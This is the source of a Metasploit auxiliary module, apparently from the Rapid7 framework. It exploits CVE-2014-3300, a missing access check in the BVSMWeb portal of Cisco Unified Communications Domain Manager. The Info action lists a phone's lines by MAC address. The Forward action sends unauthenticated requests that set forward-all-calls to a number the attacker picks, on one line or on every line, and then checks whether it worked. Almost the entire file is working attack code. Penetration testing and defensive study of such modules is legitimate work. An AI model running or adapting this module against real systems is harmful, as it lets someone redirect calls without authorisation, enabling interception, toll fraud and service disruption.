Path: blob/master/modules/auxiliary/voip/cisco_cucdm_call_forward.rb
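##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rexml/document'

# Auxiliary module for CVE-2014-3300 (BID 68331): the BVSMWeb portal of Cisco
# Unified Communications Domain Manager does not enforce access control on its
# IP phone XML services.
#
# Two actions are offered:
# * +Info+ (default) reads the call-forwarding menu of the phone identified by
#   the MAC option.
# * +Forward+ sets "forward all calls" for one line (FINTNUMBER) or for every
#   line returned by +Info+.
#
# Every request is a plain GET against showcallfwd.cgi, phonecallfwd.cgi or
# showcallfwdperline.cgi under TARGETURI with a +device=SEP<MAC>+ parameter, and
# none of them sets credentials explicitly. The module declares IOC_IN_LOGS, so
# those requests are what to look for in the portal's access logs when checking
# whether forwarding was changed this way.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata, its two actions and its options.
  #
  # @param info [Hash] metadata passed in by the framework and merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
        'Description' => %q{
          The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
          (CDM) 10 does not properly implement access control, which allows remote attackers to
          modify user information. This module exploits the vulnerability to configure unauthorized
          call forwarding.
        },
        'Author' => 'fozavci',
        'References' => [
          ['CVE', '2014-3300'],
          ['BID', '68331']
        ],
        'License' => MSF_LICENSE,
        'Actions' => [
          [ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
          [ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
        ],
        # The read-only action is the default; 'Forward' changes phone configuration.
        'DefaultAction' => 'Info',
        'Notes' => {
          'Stability' => [SERVICE_RESOURCE_LOSS],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
        OptString.new('MAC', [ true, 'MAC address of target phone', '000000000000']),
        OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
        OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP phones, required for multiple lines'])
      ]
    )
  end

  # Dispatches to the handler of the selected action. The action name is
  # upcased before the comparison; any other name does nothing.
  def run
    case action.name.upcase
    when 'INFO'
      get_info
    when 'FORWARD'
      forward_calls
    end
  end

  # Requests showcallfwd.cgi for the configured phone and prints one
  # "display name / fintnumber" pair per entry found in the XML menu.
  #
  # @return [Array<String>] the fintnumber values taken from the <URL> elements;
  #   empty when the response is missing, not a 200, lacks the "fintnumber"
  #   marker, or cannot be parsed as XML
  def get_info
    base_uri = normalize_uri(target_uri.to_s)
    mac = datastore['MAC']

    print_status('Getting fintnumbers and display names of the IP phone')

    res = send_request_cgi(
      {
        'uri' => normalize_uri(base_uri, 'showcallfwd.cgi'),
        'method' => 'GET',
        'vars_get' => {
          'device' => "SEP#{mac}"
        }
      }
    )

    # Heuristic only: a 200 whose body mentions "fintnumber" is taken as the
    # service answering without access control.
    unless res && res.code == 200 && res.body.to_s.include?('fintnumber')
      print_error('Target appears not vulnerable!')
      # res is nil when the request failed; there is nothing to show then.
      print_status(res.to_s) if res
      return []
    end

    # The body comes from the remote host and is untrusted: it can contain the
    # marker and still be malformed XML, so a parse failure must not abort the run.
    begin
      doc = REXML::Document.new(res.body)
    rescue REXML::ParseException => e
      print_error("Unable to parse the XML response: #{e.message}")
      return []
    end

    root = doc.root
    if root.nil?
      print_error('XML response has no root element')
      return []
    end

    lines = []
    fint_numbers = []

    root.get_elements('MenuItem').each do |item|
      item.get_elements('Name').each { |name| lines << name[0].to_s }
      # A <URL> without "fintnumber=" yields an empty string here.
      item.get_elements('URL').each { |url| fint_numbers << url[0].to_s.split('fintnumber=')[1].to_s }
    end

    # Names and numbers are paired by position; a missing number prints as empty.
    lines.zip(fint_numbers).each do |display_name, fint_number|
      print_status("Display Name: #{display_name}, Fintnumber: #{fint_number}")
    end

    fint_numbers
  end

  # Sends a CallForwardAll request to phonecallfwd.cgi for each selected line,
  # then reads showcallfwdperline.cgi to report whether the line shows "CFA".
  #
  # The lines are the single FINTNUMBER option when it is set, otherwise every
  # value returned by get_info. Blank values are skipped so that no
  # state-changing request goes out without a line identifier.
  #
  # @return [void]
  def forward_calls
    base_uri = normalize_uri(target_uri.to_s)
    forward_to = datastore['FORWARDTO']
    mac = datastore['MAC']

    # A blank FINTNUMBER is treated the same as an unset one.
    configured = datastore['FINTNUMBER'].to_s.strip
    fint_numbers = configured.empty? ? get_info : [configured]
    fint_numbers = fint_numbers.map(&:to_s).reject(&:empty?)

    if fint_numbers.empty?
      print_error('FINTNUMBER required to forward calls')
      return
    end

    fint_numbers.each do |fintnumber|
      print_status("Sending call forward request for #{fintnumber}")

      # State-changing request. Its response is not inspected; the outcome is
      # inferred from the follow-up read below.
      send_request_cgi(
        {
          'uri' => normalize_uri(base_uri, 'phonecallfwd.cgi'),
          'method' => 'GET',
          'vars_get' => {
            'cfoption' => 'CallForwardAll',
            'device' => "SEP#{mac}",
            'ProviderName' => 'NULL',
            'fintnumber' => fintnumber,
            'telno1' => forward_to.to_s
          }
        }
      )

      res = send_request_cgi(
        {
          'uri' => normalize_uri(base_uri, 'showcallfwdperline.cgi'),
          'method' => 'GET',
          'vars_get' => {
            'device' => "SEP#{mac}",
            'fintnumber' => fintnumber
          }
        }
      )

      # NOTE(review): "CFA" in the body only shows that forwarding is set on the
      # line; a forward that existed before this run would presumably match as
      # well. Confirm against the device before trusting the success message.
      if res && res.body.to_s.include?('CFA')
        print_good("Call forwarded successfully for #{fintnumber}")
      else
        print_error('Call forward failed')
      end
    end
  end
end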